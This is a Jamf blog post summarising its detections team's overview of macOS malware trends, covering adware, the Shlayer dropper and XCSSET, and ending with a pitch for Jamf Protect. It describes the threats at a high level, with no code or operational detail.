Jamf Blog
October 19, 2021 by Jesus Vigo

Discover the recent Mac malware trends threatening your organization

Jamf’s own Protect Detections Team presents a State of the Union of macOS malware, including which ones are the greatest concern, how they they infect endpoints and what they do once they’re installed. They also go over malware protection for Mac.

Adware Attacks! - Jaron Bradley

Adware is annoying, invasive and often buggy, introducing system instability and hogging system resources. But it also highlights a bigger concern, according to Jaron, that if malware authors are able to get adware running on your system without the user knowing, then that leaves the door open for more malicious malware, like spyware, to cause greater damage to systems, such as compromising privacy and exfiltrating sensitive data. This makes the need for enterprise malware protection a necessity — not an afterthought — to keep Mac secure and data safe.

Delivery method is often through sites that host pirated software posing as legitimate apps, but in reality, is nothing more than malware in disguise. Another popular delivery method is through fake Adobe Flash Player, which often prompts users to download a special version of Adobe’s plugin that’s been long out of development. In doing so, users are not gaining access to the plugin, rather unknowingly installing the malware on their Mac.

Rock out with Shlayer - Stuart Ashenbrener

Among “the most prevalent, resilient, ubiquitous families of malware that we’ve seen in the wild,” stated by Stuart in the video, is Shlayer. For those not aware, Shalyer has been one of the focuses of Apple’s recent updates to not only macOS but also its XProtect and MRT security software to keep macOS users protected against this and other, more nefarious malware that may be working in conjunction with Shlayer and operating in the wild. He goes on to explain how this is especially concerning as Shlayer acts as a dropper, or malware that acts as a vessel, that may carry along with it other types of malware and/or scripts to further exploit a device, obtain user data and/or gather privacy information.

Have An XCSSET Strategy - Ferdous Saljooki

An example of the types of malware that maliciously act to compromise Apple security in order to collect confidential end-user data and sensitive PII/PHI, is XCSSET. This particular piece of malware has also been on Apple’s radar, with a significant number of updates released recently to combat this threat on macOS devices. Among its repertoire of impressive attacks, hijacking mouse clicks, keylogging and/or listening/watching users through microphones and video cameras are just a few of the noted examples of the capabilities of this malware. Of interest to developers, Ferdous explains how XCSSET was found through infected GitHub repos and Xcode projects, with the aim of facilitating a pipeline attack that can be leveraged to infecting more and more applications over time. Its flexibility is further amplified by being able to utilize AppleScript and many other modules to exfiltrate private data from files, even going as far as to bypass Safari and TCC (CVE-2021-30713), among other macOS malware protection to achieve its goal.

Of course, this is just the tip of the iceberg regarding the types of malware the team discussed, including which malware types are most prevalent in the wild, how adaptable authors have become in pivoting code to infect the new M1-based Apple computers and deep-dives of how key malware works to infect endpoints and the processes they leverage to maintain persistence.

Jamf Protect’s purpose-built endpoint security keeps your Mac, users and data safeguarded against all the threats mentioned above - and then some.

Contact us today to request a trial to start protecting your Apple fleet today.

Photo of Jesus Vigo
Jesus Vigo
Jesus Vigo, Sr. Copywriter, Security.
Subscribe to the Jamf Blog

Have market trends, Apple updates and Jamf news delivered directly to your inbox.

To learn more about how we collect, use, disclose, transfer, and store your information, please visit our Privacy Policy.